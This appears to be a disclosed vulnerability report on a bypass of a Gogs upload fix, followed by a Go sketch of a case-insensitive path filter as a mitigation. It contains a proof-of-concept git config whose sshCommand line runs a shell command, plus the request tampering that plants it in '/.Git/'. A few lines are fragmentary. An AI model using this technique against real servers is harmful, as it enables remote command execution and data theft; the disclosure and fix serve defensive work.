Bypass to Remote Command Execution in uploading repository file in gogs/gogs
Jun 6th 2022
I found a bypass for CVE-2022-0415 and previous fixes.
In the fix of CVE-2022-0415, gogs filter
/.Git/ can bypass this and upload successfully
Proof of Concept
Create a repository in Gogs, upload a file config to the repository on the web page:
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
    url = email@example.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master
Intercept the HTTP POST request that submits the form, and set the parameter tree_path=/.Git/ in the request body.
Then a file with text pwnned is created in
host in a github repo
https://github.com/cokeBeer/test with name
This vulnerability allows executing commands on the remote server and gaining access to the privileged user account, which leads to sensitive data exposure, identity theft, etc.
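A path filter that matches only the exact spelling `.git` misses `/.Git/`, which names the same directory when the server's filesystem is case-insensitive (an assumption here; the uploaded config carries `ignorecase = true`). The Go sketch below is an added example, not Gogs code: `naiveIsGitPath` and `isGitPath` are hypothetical names, and it puts a case-sensitive check beside one that folds case on every path component.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// naiveIsGitPath is a constructed stand-in for a case-sensitive filter:
// it only recognises the exact spelling ".git".
func naiveIsGitPath(treePath string) bool {
	for _, part := range strings.Split(path.Clean("/"+treePath), "/") {
		if part == ".git" {
			return true
		}
	}
	return false
}

// isGitPath (hypothetical helper) normalises the path, then compares every
// component to ".git" with case folding, so ".Git" and ".GIT" are rejected too.
func isGitPath(treePath string) bool {
	for _, part := range strings.Split(path.Clean("/"+treePath), "/") {
		if strings.EqualFold(part, ".git") {
			return true
		}
	}
	return false
}

func main() {
	// Constructed sample tree_path values; "/.Git/" is the one from the report.
	samples := []string{"/.git/", "/.Git/", "docs/.GIT/config", "src/.gitignore", "a/../.Git"}
	for _, p := range samples {
		fmt.Printf("%-20q naive=%-5v hardened=%v\n", p, naiveIsGitPath(p), isGitPath(p))
	}
}
```

Call the check on the server side for every user-supplied path (upload target, new file name, rename target) before anything is written to the working tree.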